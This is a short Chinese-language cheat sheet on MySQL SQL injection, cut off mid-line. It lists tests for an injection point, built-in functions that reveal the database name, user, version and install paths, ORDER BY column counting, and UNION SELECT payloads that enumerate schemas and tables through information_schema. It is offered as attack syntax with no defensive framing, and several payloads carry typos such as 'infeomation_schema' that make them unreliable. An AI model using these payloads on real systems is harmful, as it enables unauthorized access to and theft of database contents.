数据库注入语法
一.判断是否有注入点
简单如:
and 1=1
and 1=2
二.要搜寻的一些基本信息
数据库名 database()
用户名 user()
数据库版本信息 version()
版本大于5.0,自身带有数据库信息。可以查询用户,表名,列名
操作系统 @@version_compile_os
mysql安装路径 @@basedir
数据库路径 @@datadir
table_name 表名
column_name 列名
table_schema 数据库名
information_schema.tables 记录表名信息的表
information_schema.columns 记录列名信息的表
三.order by 1,2,3 确定字段数
- union select database(),user(),version(),@@version_complie_os
得到:数据库名 用户名 版本 系统信息 - union select schema_name,2 from infeomation_schema.schemata
得到:mysql数据库下的所有数据库名 - union select table_name,2 from information_schema.tables where table_schema=’数据库名’
得到:该数据库下面的所有表名
union select table_name,table_schema from information_schem